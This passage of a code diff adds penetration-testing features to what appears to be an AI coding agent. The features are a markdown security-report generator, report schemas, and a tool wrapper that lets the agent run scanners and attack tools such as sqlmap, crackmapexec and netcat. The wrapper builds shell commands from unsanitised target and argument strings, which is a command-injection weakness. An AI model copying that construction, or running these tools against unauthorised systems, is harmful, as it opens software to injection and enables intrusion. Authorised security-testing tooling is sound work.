+  if (data.config.headerContent) {
+    lines.push("")
+    lines.push(data.config.headerContent)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate executive summary section.
+ */
+function generateExecutiveSummary(data: ReportData): string {
+  const lines: string[] = []
+  const { severityStats } = data
+
+  lines.push("## Executive Summary")
+  lines.push("")
+
+  // Risk overview
+  const riskLevel = getRiskLevel(severityStats)
+  lines.push(`### Overall Risk Assessment: **${riskLevel}**`)
+  lines.push("")
+
+  // Summary paragraph
+  const criticalHigh = severityStats.critical + severityStats.high
+  if (criticalHigh > 0) {
+    lines.push(`This security assessment identified **${severityStats.total} findings**, including **${criticalHigh} critical or high severity issues** that require immediate attention. These vulnerabilities could potentially allow unauthorized access, data breaches, or system compromise if left unaddressed.`)
+  } else if (severityStats.medium > 0) {
+    lines.push(`This security assessment identified **${severityStats.total} findings**, with **${severityStats.medium} medium severity issues** that should be addressed in the near term. While no critical vulnerabilities were found, the identified issues still present security risks that should be remediated.`)
+  } else {
+    lines.push(`This security assessment identified **${severityStats.total} findings**. No critical or high severity vulnerabilities were discovered. The identified issues are primarily informational or low severity and represent opportunities for security hardening.`)
+  }
+  lines.push("")
+
+  // Key statistics
+  lines.push("### Key Statistics")
+  lines.push("")
+  lines.push("| Severity | Count |")
+  lines.push("|----------|-------|")
+  lines.push(`| Critical | ${severityStats.critical} |`)
+  lines.push(`| High | ${severityStats.high} |`)
+  lines.push(`| Medium | ${severityStats.medium} |`)
+  lines.push(`| Low | ${severityStats.low} |`)
+  lines.push(`| Info | ${severityStats.info} |`)
+  lines.push(`| **Total** | **${severityStats.total}** |`)
+
+  return lines.join("\n")
+}
+
+/**
+ * Determine overall risk level based on findings.
+ */
+function getRiskLevel(stats: SeverityStats): string {
+  if (stats.critical > 0) return "CRITICAL"
+  if (stats.high > 0) return "HIGH"
+  if (stats.medium > 0) return "MEDIUM"
+  if (stats.low > 0) return "LOW"
+  return "INFORMATIONAL"
+}
+
+/**
+ * Generate scope section.
+ */
+function generateScopeSection(config: ReportConfig): string {
+  if (!config.scope) return ""
+
+  const lines: string[] = []
+
+  lines.push("## Scope")
+  lines.push("")
+
+  if (config.scope.description) {
+    lines.push(config.scope.description)
+    lines.push("")
+  }
+
+  lines.push("### In-Scope Targets")
+  lines.push("")
+  for (const target of config.scope.targets) {
+    lines.push(`- ${target}`)
+  }
+
+  if (config.scope.exclusions?.length) {
+    lines.push("")
+    lines.push("### Exclusions")
+    lines.push("")
+    for (const exclusion of config.scope.exclusions) {
+      lines.push(`- ${exclusion}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate methodology section.
+ */
+function generateMethodologySection(config: ReportConfig): string {
+  const lines: string[] = []
+
+  lines.push("## Methodology")
+  lines.push("")
+
+  if (config.methodology) {
+    lines.push(config.methodology)
+  } else {
+    // Default methodology text
+    lines.push("The security assessment was conducted using a combination of automated scanning tools and manual testing techniques. The methodology followed industry-standard practices including:")
+    lines.push("")
+    lines.push("1. **Reconnaissance** - Information gathering and target enumeration")
+    lines.push("2. **Scanning** - Automated vulnerability scanning and service detection")
+    lines.push("3. **Analysis** - Manual verification and impact assessment of findings")
+    lines.push("4. **Reporting** - Documentation of vulnerabilities and remediation guidance")
+    lines.push("")
+    lines.push("Tools used in this assessment may include: Nmap, Nikto, Nuclei, Gobuster, FFuf, SSLScan, and other industry-standard security testing tools.")
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate findings summary section.
+ */
+function generateFindingsSummary(data: ReportData): string {
+  const lines: string[] = []
+
+  lines.push("## Findings Summary")
+  lines.push("")
+
+  // Group findings by severity
+  const bySeverity = groupBySeverity(data.findings)
+
+  // Summary table
+  lines.push("| # | Severity | Title | Target | Status |")
+  lines.push("|---|----------|-------|--------|--------|")
+
+  let index = 1
+  const severityOrder: PentestTypes.Severity[] = ["critical", "high", "medium", "low", "info"]
+
+  for (const severity of severityOrder) {
+    const findings = bySeverity[severity] || []
+    for (const finding of findings) {
+      const severityBadge = getSeverityBadge(finding.severity)
+      const targetPort = finding.port ? `${finding.target}:${finding.port}` : finding.target
+      lines.push(`| ${index} | ${severityBadge} | ${finding.title} | ${targetPort} | ${finding.status} |`)
+      index++
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate detailed findings section.
+ */
+function generateDetailedFindings(data: ReportData): string {
+  const lines: string[] = []
+
+  lines.push("## Detailed Findings")
+  lines.push("")
+
+  // Group findings by severity
+  const bySeverity = groupBySeverity(data.findings)
+  const severityOrder: PentestTypes.Severity[] = ["critical", "high", "medium", "low", "info"]
+
+  let findingNum = 1
+  for (const severity of severityOrder) {
+    const findings = bySeverity[severity] || []
+    if (findings.length === 0) continue
+
+    lines.push(`### ${severity.toUpperCase()} Severity Findings`)
+    lines.push("")
+
+    for (const finding of findings) {
+      lines.push(formatFinding(finding, findingNum, data.config.includeRemediation))
+      lines.push("")
+      findingNum++
+    }
+  }
+
+  if (data.findings.length === 0) {
+    lines.push("*No findings to report.*")
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format a single finding for the report.
+ */
+function formatFinding(finding: PentestTypes.Finding, num: number, includeRemediation: boolean): string {
+  const lines: string[] = []
+
+  lines.push(`#### ${num}. ${finding.title}`)
+  lines.push("")
+
+  // Metadata table
+  lines.push("| Property | Value |")
+  lines.push("|----------|-------|")
+  lines.push(`| **Severity** | ${getSeverityBadge(finding.severity)} |`)
+  lines.push(`| **Status** | ${finding.status} |`)
+  lines.push(`| **Target** | ${finding.target}${finding.port ? `:${finding.port}` : ""} |`)
+  if (finding.service) {
+    lines.push(`| **Service** | ${finding.service} |`)
+  }
+  if (finding.protocol) {
+    lines.push(`| **Protocol** | ${finding.protocol} |`)
+  }
+  lines.push("")
+
+  // Description
+  lines.push("**Description:**")
+  lines.push("")
+  lines.push(finding.description)
+  lines.push("")
+
+  // Evidence
+  if (finding.evidence) {
+    lines.push("**Evidence:**")
+    lines.push("")
+    lines.push("```")
+    lines.push(finding.evidence)
+    lines.push("```")
+    lines.push("")
+  }
+
+  // CVE References
+  if (finding.cve?.length) {
+    lines.push("**CVE References:**")
+    lines.push("")
+    for (const cve of finding.cve) {
+      lines.push(`- [${cve}](https://nvd.nist.gov/vuln/detail/${cve})`)
+    }
+    lines.push("")
+  }
+
+  // Other References
+  if (finding.references?.length) {
+    lines.push("**References:**")
+    lines.push("")
+    for (const ref of finding.references) {
+      lines.push(`- ${ref}`)
+    }
+    lines.push("")
+  }
+
+  // Remediation
+  if (includeRemediation && finding.remediation) {
+    lines.push("**Remediation:**")
+    lines.push("")
+    lines.push(finding.remediation)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate remediation summary section.
+ */
+function generateRemediationSummary(data: ReportData): string {
+  const lines: string[] = []
+
+  lines.push("## Remediation Summary")
+  lines.push("")
+
+  // Group remediation by priority
+  const criticalHigh = data.findings.filter(f => f.severity === "critical" || f.severity === "high")
+  const medium = data.findings.filter(f => f.severity === "medium")
+  const lowInfo = data.findings.filter(f => f.severity === "low" || f.severity === "info")
+
+  if (criticalHigh.length > 0) {
+    lines.push("### Immediate Action Required")
+    lines.push("")
+    lines.push("The following issues should be addressed immediately:")
+    lines.push("")
+    for (const finding of criticalHigh) {
+      if (finding.remediation) {
+        lines.push(`- **${finding.title}**: ${finding.remediation}`)
+      } else {
+        lines.push(`- **${finding.title}**: Review and remediate this ${finding.severity} severity issue.`)
+      }
+    }
+    lines.push("")
+  }
+
+  if (medium.length > 0) {
+    lines.push("### Short-Term Remediation")
+    lines.push("")
+    lines.push("The following issues should be addressed within 30 days:")
+    lines.push("")
+    for (const finding of medium) {
+      if (finding.remediation) {
+        lines.push(`- **${finding.title}**: ${finding.remediation}`)
+      } else {
+        lines.push(`- **${finding.title}**: Review and remediate this medium severity issue.`)
+      }
+    }
+    lines.push("")
+  }
+
+  if (lowInfo.length > 0) {
+    lines.push("### Long-Term Improvements")
+    lines.push("")
+    lines.push("The following issues represent opportunities for security hardening:")
+    lines.push("")
+    for (const finding of lowInfo) {
+      if (finding.remediation) {
+        lines.push(`- **${finding.title}**: ${finding.remediation}`)
+      }
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate appendix with raw scan data.
+ */
+function generateAppendix(data: ReportData): string {
+  if (!data.scans?.length) return ""
+
+  const lines: string[] = []
+
+  lines.push("## Appendix: Raw Scan Data")
+  lines.push("")
+
+  for (const scan of data.scans) {
+    lines.push(`### Scan: ${scan.target}`)
+    lines.push("")
+    lines.push(`- **Type:** ${scan.scanType}`)
+    lines.push(`- **Command:** \`${scan.command}\``)
+    lines.push(`- **Started:** ${new Date(scan.startTime).toLocaleString()}`)
+    if (scan.endTime) {
+      lines.push(`- **Duration:** ${((scan.endTime - scan.startTime) / 1000).toFixed(2)}s`)
+    }
+    lines.push("")
+
+    if (scan.rawOutput) {
+      lines.push("<details>")
+      lines.push("<summary>Raw Output</summary>")
+      lines.push("")
+      lines.push("```")
+      lines.push(scan.rawOutput.slice(0, 5000)) // Limit output size
+      if (scan.rawOutput.length > 5000) {
+        lines.push("... [output truncated]")
+      }
+      lines.push("```")
+      lines.push("</details>")
+      lines.push("")
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Generate report footer.
+ */
+function generateFooter(data: ReportData): string {
+  const lines: string[] = []
+
+  if (data.config.footerContent) {
+    lines.push(data.config.footerContent)
+    lines.push("")
+  }
+
+  lines.push("---")
+  lines.push("")
+  lines.push(`*Report generated by cyxwiz Security Assessment Platform*`)
+  lines.push(`*Report ID: ${data.reportId}*`)
+
+  return lines.join("\n")
+}
+
+/**
+ * Get severity badge for markdown.
+ */
+function getSeverityBadge(severity: PentestTypes.Severity): string {
+  const badges: Record<PentestTypes.Severity, string> = {
+    critical: "🔴 Critical",
+    high: "🟠 High",
+    medium: "🟡 Medium",
+    low: "🟢 Low",
+    info: "🔵 Info",
+  }
+  return badges[severity]
+}
+
+/**
+ * Group findings by severity.
+ */
+function groupBySeverity(findings: PentestTypes.Finding[]): Record<PentestTypes.Severity, PentestTypes.Finding[]> {
+  const result: Record<PentestTypes.Severity, PentestTypes.Finding[]> = {
+    critical: [],
+    high: [],
+    medium: [],
+    low: [],
+    info: [],
+  }
+
+  for (const finding of findings) {
+    result[finding.severity].push(finding)
+  }
+
+  return result
+}
diff --git a/packages/opencode/src/pentest/reports/types.ts b/packages/opencode/src/pentest/reports/types.ts
new file mode 100644
index 00000000000..597570ea012
--- /dev/null
+++ b/packages/opencode/src/pentest/reports/types.ts
@@ -0,0 +1,178 @@
+/**
+ * @fileoverview Report Types
+ *
+ * Type definitions for security assessment reports.
+ *
+ * @module pentest/reports/types
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+
+/**
+ * Report format options.
+ */
+export const ReportFormat = z.enum(["markdown", "html", "json"])
+export type ReportFormat = z.infer<typeof ReportFormat>
+
+/**
+ * Report type/style options.
+ */
+export const ReportType = z.enum(["executive", "technical", "compliance", "full"])
+export type ReportType = z.infer<typeof ReportType>
+
+/**
+ * Severity filter for reports.
+ */
+export const SeverityFilter = z.object({
+  include: z.array(PentestTypes.Severity).optional(),
+  exclude: z.array(PentestTypes.Severity).optional(),
+  minSeverity: PentestTypes.Severity.optional(),
+})
+export type SeverityFilter = z.infer<typeof SeverityFilter>
+
+/**
+ * Report configuration options.
+ */
+export const ReportConfig = z.object({
+  /** Report title */
+  title: z.string().default("Security Assessment Report"),
+
+  /** Report type/style */
+  type: ReportType.default("technical"),
+
+  /** Output format */
+  format: ReportFormat.default("markdown"),
+
+  /** Organization/client name */
+  organization: z.string().optional(),
+
+  /** Assessor/tester name */
+  assessor: z.string().optional(),
+
+  /** Assessment date range */
+  dateRange: z.object({
+    start: z.number(),
+    end: z.number(),
+  }).optional(),
+
+  /** Target scope description */
+  scope: z.object({
+    targets: z.array(z.string()),
+    description: z.string().optional(),
+    exclusions: z.array(z.string()).optional(),
+  }).optional(),
+
+  /** Severity filtering */
+  severityFilter: SeverityFilter.optional(),
+
+  /** Status filtering */
+  statusFilter: z.array(PentestTypes.FindingStatus).optional(),
+
+  /** Include raw scan data */
+  includeRawData: z.boolean().default(false),
+
+  /** Include remediation recommendations */
+  includeRemediation: z.boolean().default(true),
+
+  /** Include executive summary */
+  includeExecutiveSummary: z.boolean().default(true),
+
+  /** Include methodology section */
+  includeMethodology: z.boolean().default(true),
+
+  /** Custom methodology text */
+  methodology: z.string().optional(),
+
+  /** Include charts/graphs (HTML only) */
+  includeCharts: z.boolean().default(true),
+
+  /** Custom CSS for HTML reports */
+  customCss: z.string().optional(),
+
+  /** Custom header content */
+  headerContent: z.string().optional(),
+
+  /** Custom footer content */
+  footerContent: z.string().optional(),
+})
+export type ReportConfig = z.infer<typeof ReportConfig>
+
+/**
+ * Severity statistics for reports.
+ */
+export const SeverityStats = z.object({
+  critical: z.number(),
+  high: z.number(),
+  medium: z.number(),
+  low: z.number(),
+  info: z.number(),
+  total: z.number(),
+})
+export type SeverityStats = z.infer<typeof SeverityStats>
+
+/**
+ * Status statistics for reports.
+ */
+export const StatusStats = z.object({
+  open: z.number(),
+  confirmed: z.number(),
+  mitigated: z.number(),
+  false_positive: z.number(),
+})
+export type StatusStats = z.infer<typeof StatusStats>
+
+/**
+ * Report data structure.
+ */
+export const ReportData = z.object({
+  /** Report configuration */
+  config: ReportConfig,
+
+  /** Findings to include */
+  findings: z.array(PentestTypes.Finding),
+
+  /** Scan results to include */
+  scans: z.array(PentestTypes.ScanResult).optional(),
+
+  /** Severity statistics */
+  severityStats: SeverityStats,
+
+  /** Status statistics */
+  statusStats: StatusStats,
+
+  /** Generation timestamp */
+  generatedAt: z.number(),
+
+  /** Report ID */
+  reportId: z.string(),
+})
+export type ReportData = z.infer<typeof ReportData>
+
+/**
+ * Generated report output.
+ */
+export const GeneratedReport = z.object({
+  /** Report ID */
+  id: z.string(),
+
+  /** Report title */
+  title: z.string(),
+
+  /** Output format */
+  format: ReportFormat,
+
+  /** Report content */
+  content: z.string(),
+
+  /** Generation timestamp */
+  generatedAt: z.number(),
+
+  /** Statistics */
+  stats: z.object({
+    findings: z.number(),
+    scans: z.number(),
+    severity: SeverityStats,
+  }),
+})
+export type GeneratedReport = z.infer<typeof GeneratedReport>
diff --git a/packages/opencode/src/pentest/sectools.ts b/packages/opencode/src/pentest/sectools.ts
new file mode 100644
index 00000000000..03a7a9c14e9
--- /dev/null
+++ b/packages/opencode/src/pentest/sectools.ts
@@ -0,0 +1,574 @@
+/**
+ * @fileoverview Security Tools Wrapper
+ *
+ * Provides a unified interface to common penetration testing tools
+ * found on Kali Linux, Parrot OS, and other security distributions.
+ *
+ * Supported tool categories:
+ * - Network Reconnaissance: nmap, masscan, netcat
+ * - Web Scanning: nikto, dirb, gobuster, ffuf, wpscan
+ * - Vulnerability Scanning: nuclei, searchsploit
+ * - SQL Injection: sqlmap
+ * - SMB/Windows: enum4linux, smbclient, crackmapexec
+ * - SSL/TLS: sslscan, sslyze, testssl
+ * - DNS: dnsenum, dnsrecon, fierce
+ *
+ * @module pentest/sectools
+ */
+
+import z from "zod"
+import { spawn } from "child_process"
+import { Tool } from "../tool/tool"
+import { Log } from "../util/log"
+import { Instance } from "../project/instance"
+import { Findings } from "./findings"
+import { PentestTypes } from "./types"
+import { Bus } from "../bus"
+import { randomBytes } from "crypto"
+import { hasParser, getParser, type ParserName } from "./parsers"
+import { NiktoParser } from "./parsers/nikto"
+import { NucleiParser } from "./parsers/nuclei"
+import { GobusterParser } from "./parsers/gobuster"
+import { FfufParser } from "./parsers/ffuf"
+import { SslscanParser } from "./parsers/sslscan"
+
+const log = Log.create({ service: "pentest.sectools" })
+
+const DEFAULT_TIMEOUT = 10 * 60 * 1000 // 10 minutes
+
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(8).toString("hex")
+  return `sectool_${timestamp}_${random}`
+}
+
+/**
+ * Supported security tools and their categories
+ */
+const SUPPORTED_TOOLS = {
+  // Network Reconnaissance
+  nmap: { category: "recon", description: "Network port scanner" },
+  masscan: { category: "recon", description: "Fast network scanner" },
+  netcat: { category: "recon", description: "Network utility (nc)" },
+  nc: { category: "recon", description: "Network utility (netcat)" },
+
+  // Web Scanning
+  nikto: { category: "web", description: "Web server scanner" },
+  dirb: { category: "web", description: "Web directory brute forcer" },
+  gobuster: { category: "web", description: "Directory/DNS/VHost brute forcer" },
+  ffuf: { category: "web", description: "Fast web fuzzer" },
+  wpscan: { category: "web", description: "WordPress security scanner" },
+  whatweb: { category: "web", description: "Web fingerprinter" },
+  wafw00f: { category: "web", description: "Web application firewall detector" },
+
+  // Vulnerability Scanning
+  nuclei: { category: "vuln", description: "Template-based vulnerability scanner" },
+  searchsploit: { category: "vuln", description: "Exploit database search" },
+
+  // SQL Injection
+  sqlmap: { category: "sqli", description: "SQL injection automation tool" },
+
+  // SMB/Windows
+  enum4linux: { category: "smb", description: "SMB/Samba enumeration" },
+  smbclient: { category: "smb", description: "SMB/CIFS client" },
+  crackmapexec: { category: "smb", description: "Network protocol attack tool" },
+  rpcclient: { category: "smb", description: "RPC client for Windows" },
+
+  // SSL/TLS
+  sslscan: { category: "ssl", description: "SSL/TLS scanner" },
+  sslyze: { category: "ssl", description: "SSL/TLS configuration analyzer" },
+  testssl: { category: "ssl", description: "TLS/SSL testing tool" },
+
+  // DNS
+  dnsenum: { category: "dns", description: "DNS enumeration tool" },
+  dnsrecon: { category: "dns", description: "DNS reconnaissance tool" },
+  fierce: { category: "dns", description: "DNS reconnaissance" },
+
+  // Other
+  curl: { category: "http", description: "HTTP client" },
+  wget: { category: "http", description: "HTTP downloader" },
+  ping: { category: "net", description: "ICMP ping" },
+  traceroute: { category: "net", description: "Network path tracer" },
+  dig: { category: "dns", description: "DNS lookup" },
+  host: { category: "dns", description: "DNS lookup" },
+  whois: { category: "dns", description: "WHOIS lookup" },
+} as const
+
+type SupportedTool = keyof typeof SUPPORTED_TOOLS
+
+/**
+ * Security Tools wrapper for pentest operations.
+ *
+ * Provides a unified interface to common security tools with:
+ * - Automatic tool detection
+ * - Output capture and formatting
+ * - Findings generation
+ * - Governance integration
+ */
+export const SecToolsTool = Tool.define("sectools", async () => {
+  return {
+    description: `Execute security testing tools commonly found on Kali Linux and Parrot OS.
+
+SUPPORTED TOOLS:
+Network Recon: nmap, masscan, netcat (nc)
+Web Scanning: nikto, dirb, gobuster, ffuf, wpscan, whatweb, wafw00f
+Vuln Scanning: nuclei, searchsploit
+SQL Injection: sqlmap
+SMB/Windows: enum4linux, smbclient, crackmapexec, rpcclient
+SSL/TLS: sslscan, sslyze, testssl
+DNS: dnsenum, dnsrecon, fierce, dig, host, whois
+Other: curl, wget, ping, traceroute
+
+USAGE:
+- tool: The security tool to run (e.g., "nikto", "gobuster")
+- target: Target URL, IP, or hostname
+- args: Additional arguments for the tool
+
+EXAMPLES:
+- Nikto scan: tool="nikto", target="http://example.com", args="-Tuning 1"
+- Gobuster: tool="gobuster", target="http://example.com", args="dir -w /usr/share/wordlists/dirb/common.txt"
+- Enum4linux: tool="enum4linux", target="192.168.1.1", args="-a"
+- SSLScan: tool="sslscan", target="example.com"
+
+NOTE: All scans are subject to governance scope restrictions.`,
+
+    parameters: z.object({
+      tool: z
+        .string()
+        .describe("Security tool to run (e.g., nikto, gobuster, enum4linux, sslscan)"),
+      target: z
+        .string()
+        .describe("Target URL, IP address, or hostname to scan"),
+      args: z
+        .string()
+        .optional()
+        .describe("Additional command-line arguments for the tool"),
+      timeout: z
+        .number()
+        .optional()
+        .describe("Timeout in milliseconds. Default: 600000 (10 minutes)"),
+      createFindings: z
+        .boolean()
+        .optional()
+        .default(false)
+        .describe("Automatically create findings from significant results. Default: false"),
+    }),
+
+    async execute(params, ctx) {
+      const toolName = params.tool.toLowerCase() as SupportedTool
+      const toolInfo = SUPPORTED_TOOLS[toolName]
+
+      if (!toolInfo) {
+        return {
+          title: `Unknown tool: ${params.tool}`,
+          output: `Tool "${params.tool}" is not in the supported list.\n\nSupported tools:\n${Object.entries(SUPPORTED_TOOLS)
+            .map(([name, info]) => `  ${name}: ${info.description}`)
+            .join("\n")}`,
+          metadata: {
+            scanID: "",
+            tool: params.tool,
+            target: params.target,
+            status: "error",
+          },
+        }
+      }
+
+      const scanID = generateScanId()
+      const startTime = Date.now()
+
+      // Build command
+      const command = buildCommand(toolName, params.target, params.args)
+
+      // Request permission
+      await ctx.ask({
+        permission: "bash",
+        patterns: [command],
+        always: [`${toolName} *`],
+        metadata: {
+          tool: toolName,
+          category: toolInfo.category,
+          target: params.target,
+        },
+      })
+
+      log.info("Starting security tool", {
+        scanID,
+        tool: toolName,
+        target: params.target,
+        command,
+      })
+
+      // Publish scan started event
+      try {
+        Bus.publish(PentestTypes.Event.ScanStarted, {
+          scanID,
+          tool: toolName,
+          target: params.target,
+          command,
+        })
+      } catch {
+        // Ignore bus errors if no instance context
+      }
+
+      // Initialize metadata
+      ctx.metadata({
+        title: `Running ${toolName} on ${params.target}`,
+        metadata: {
+          scanID,
+          tool: toolName,
+          target: params.target,
+          status: "running",
+        },
+      })
+
+      const timeout = params.timeout ?? DEFAULT_TIMEOUT
+
+      // Execute tool
+      const proc = spawn(command, {
+        shell: true,
+        cwd: Instance.directory,
+        stdio: ["ignore", "pipe", "pipe"],
+      })
+
+      let stdout = ""
+      let stderr = ""
+
+      proc.stdout?.on("data", (chunk: Buffer) => {
+        stdout += chunk.toString()
+        ctx.metadata({
+          metadata: {
+            scanID,
+            tool: toolName,
+            target: params.target,
+            status: "running",
+            outputLength: stdout.length,
+          },
+        })
+      })
+
+      proc.stderr?.on("data", (chunk: Buffer) => {
+        stderr += chunk.toString()
+      })
+
+      let timedOut = false
+      let aborted = false
+
+      const abortHandler = () => {
+        aborted = true
+        proc.kill("SIGTERM")
+      }
+      ctx.abort.addEventListener("abort", abortHandler, { once: true })
+
+      const timeoutTimer = setTimeout(() => {
+        timedOut = true
+        proc.kill("SIGTERM")
+      }, timeout)
+
+      await new Promise<void>((resolve, reject) => {
+        proc.once("exit", () => {
+          clearTimeout(timeoutTimer)
+          ctx.abort.removeEventListener("abort", abortHandler)
+          resolve()
+        })
+        proc.once("error", (err) => {
+          clearTimeout(timeoutTimer)
+          ctx.abort.removeEventListener("abort", abortHandler)
+          reject(err)
+        })
+      })
+
+      const endTime = Date.now()
+      const duration = endTime - startTime
+
+      // Combine output
+      let output = stdout
+      if (stderr && !stderr.includes("Starting") && !stderr.includes("Progress")) {
+        output += "\n\n--- STDERR ---\n" + stderr
+      }
+
+      // Check for common errors
+      if (proc.exitCode !== 0 && !timedOut && !aborted) {
+        const notInstalled = stderr.includes("command not found") ||
+          stderr.includes("not found") ||
+          stderr.includes("No such file")
+
+        if (notInstalled) {
+          return {
+            title: `Tool not installed: ${toolName}`,
+            output: `The tool "${toolName}" is not installed on this system.\n\nInstall it on Kali/Parrot with:\n  apt install ${getPackageName(toolName)}\n\nError: ${stderr}`,
+            metadata: {
+              scanID: "",
+              tool: toolName,
+              target: params.target,
+              status: "not_installed",
+            },
+          }
+        }
+      }
+
+      // Add status notes
+      if (timedOut) {
+        output += `\n\n[NOTE] Command terminated after ${timeout / 1000}s timeout`
+      }
+      if (aborted) {
+        output += "\n[NOTE] Command was aborted by user"
+      }
+
+      // Create findings if requested
+      if (params.createFindings && proc.exitCode === 0) {
+        await createToolFindings(toolName, params.target, output, ctx.sessionID, scanID)
+      }
+
+      // Save scan result
+      const scanResult: PentestTypes.ScanResult = {
+        id: scanID,
+        sessionID: ctx.sessionID,
+        scanType: "custom",
+        target: params.target,
+        command,
+        startTime,
+        endTime,
+        hosts: [],
+        rawOutput: output,
+        summary: `${toolName} scan of ${params.target}`,
+      }
+
+      await Findings.saveScan(scanResult, { storage: "file" })
+
+      log.info("Security tool completed", {
+        scanID,
+        tool: toolName,
+        target: params.target,
+        exitCode: proc.exitCode,
+        duration,
+        outputLength: output.length,
+      })
+
+      const status = timedOut ? "timeout" : aborted ? "aborted" : "completed"
+      return {
+        title: `${toolName} scan complete (${(duration / 1000).toFixed(1)}s)`,
+        output,
+        metadata: {
+          scanID,
+          tool: toolName,
+          target: params.target,
+          status,
+        },
+      }
+    },
+  }
+})
+
+/**
+ * Build command string for a security tool.
+ */
+function buildCommand(tool: SupportedTool, target: string, args?: string): string {
+  const parts: string[] = [tool]
+
+  // Tool-specific target placement
+  switch (tool) {
+    case "nikto":
+      parts.push("-h", target)
+      if (args) parts.push(args)
+      break
+
+    case "gobuster":
+      // gobuster needs subcommand first
+      if (args) {
+        parts.push(args)
+      } else {
+        parts.push("dir")
+      }
+      parts.push("-u", target)
+      break
+
+    case "ffuf":
+      parts.push("-u", target)
+      if (args) parts.push(args)
+      break
+
+    case "wpscan":
+      parts.push("--url", target)
+      if (args) parts.push(args)
+      break
+
+    case "sqlmap":
+      parts.push("-u", target)
+      if (args) parts.push(args)
+      parts.push("--batch") // Non-interactive
+      break
+
+    case "nuclei":
+      parts.push("-target", target)
+      if (args) parts.push(args)
+      break
+
+    case "enum4linux":
+      if (args) parts.push(args)
+      parts.push(target)
+      break
+
+    case "sslscan":
+    case "sslyze":
+    case "testssl":
+      if (args) parts.push(args)
+      parts.push(target)
+      break
+
+    case "dirb":
+      parts.push(target)
+      if (args) parts.push(args)
+      break
+
+    default:
+      if (args) parts.push(args)
+      parts.push(target)
+  }
+
+  return parts.join(" ")
+}
+
+/**
+ * Get package name for installation.
+ */
+function getPackageName(tool: SupportedTool): string {
+  const packageMap: Partial<Record<SupportedTool, string>> = {
+    nc: "netcat-traditional",
+    netcat: "netcat-traditional",
+    testssl: "testssl.sh",
+    crackmapexec: "crackmapexec",
+    ffuf: "ffuf",
+  }
+  return packageMap[tool] || tool
+}
+
+/**
+ * Create findings from tool output using structured parsers when available.
+ */
+async function createToolFindings(
+  tool: SupportedTool,
+  target: string,
+  output: string,
+  sessionID: string,
+  scanID: string
+): Promise<void> {
+  let parsedFindings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+  // Use structured parsers when available
+  switch (tool) {
+    case "nikto": {
+      const result = NiktoParser.parse(output, target)
+      parsedFindings = NiktoParser.toFindings(result, sessionID, scanID)
+      break
+    }
+
+    case "nuclei": {
+      const result = NucleiParser.parse(output, target)
+      parsedFindings = NucleiParser.toFindings(result, sessionID, scanID)
+      break
+    }
+
+    case "gobuster": {
+      const result = GobusterParser.parse(output, target, "dir")
+      parsedFindings = GobusterParser.toFindings(result, sessionID, scanID)
+      break
+    }
+
+    case "ffuf": {
+      const result = FfufParser.parse(output, target)
+      parsedFindings = FfufParser.toFindings(result, sessionID, scanID)
+      break
+    }
+
+    case "sslscan":
+    case "sslyze": {
+      const result = SslscanParser.parse(output, target)
+      parsedFindings = SslscanParser.toFindings(result, sessionID, scanID)
+      break
+    }
+
+    // Fallback for tools without dedicated parsers
+    case "testssl":
+      if (output.includes("SSLv2") || output.includes("SSLv3")) {
+        parsedFindings.push({
+          sessionID,
+          scanID,
+          title: "Deprecated SSL Protocol Supported",
+          description: "Server supports deprecated SSL protocols (SSLv2/SSLv3)",
+          severity: "high",
+          status: "open",
+          target,
+          evidence: "SSL scan detected legacy protocol support",
+        })
+      }
+      if (output.includes("TLSv1.0") || output.includes("TLSv1.1")) {
+        parsedFindings.push({
+          sessionID,
+          scanID,
+          title: "Deprecated TLS Protocol Supported",
+          description: "Server supports deprecated TLS 1.0/1.1 protocols",
+          severity: "medium",
+          status: "open",
+          target,
+          evidence: "SSL scan detected legacy TLS protocol support",
+        })
+      }
+      break
+
+    case "enum4linux":
+      if (output.includes("Anonymous login")) {
+        parsedFindings.push({
+          sessionID,
+          scanID,
+          title: "SMB Anonymous Access Allowed",
+          description: "SMB server allows anonymous connections",
+          severity: "high",
+          status: "open",
+          target,
+          evidence: "enum4linux detected anonymous SMB access",
+        })
+      }
+      break
+  }
+
+  // Create findings from parsed results
+  for (const finding of parsedFindings) {
+    await Findings.create(finding, { storage: "file" })
+  }
+}
+
+/**
+ * Format tool output using structured parsers when available.
+ */
+function formatToolOutput(tool: SupportedTool, output: string, target: string): string {
+  try {
+    switch (tool) {
+      case "nikto": {
+        const result = NiktoParser.parse(output, target)
+        return NiktoParser.format(result)
+      }
+      case "nuclei": {
+        const result = NucleiParser.parse(output, target)
+        return NucleiParser.format(result)
+      }
+      case "gobuster": {
+        const result = GobusterParser.parse(output, target, "dir")
+        return GobusterParser.format(result)
+      }
+      case "ffuf": {
+        const result = FfufParser.parse(output, target)
+        return FfufParser.format(result)
+      }
+      case "sslscan":
+      case "sslyze": {
+        const result = SslscanParser.parse(output, target)
+        return SslscanParser.format(result)
+      }
+      default:
+        return output
+    }
+  } catch {
+    // Return raw output if parsing fails
+    return output
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/awareness/index.ts b/packages/opencode/src/pentest/soceng/awareness/index.ts
new file mode 100644
index 00000000000..d4a765da2c7
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/awareness/index.ts
@@ -0,0 +1,11 @@
+/**
+ * @fileoverview Security Awareness Module
+ *
+ * Security awareness training, metrics, and reporting.
+ *
+ * @module pentest/soceng/awareness
+ */
+
+export { AwarenessTraining } from "./training"
+export { AwarenessMetrics } from "./metrics"
+export { AwarenessReporting } from "./reporting"
diff --git a/packages/opencode/src/pentest/soceng/awareness/metrics.ts b/packages/opencode/src/pentest/soceng/awareness/metrics.ts
new file mode 100644
index 00000000000..27451f1f337
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/awareness/metrics.ts
@@ -0,0 +1,465 @@
+/**
+ * @fileoverview Security Awareness Metrics
+ *
+ * Metrics and analytics for security awareness programs.
+ *
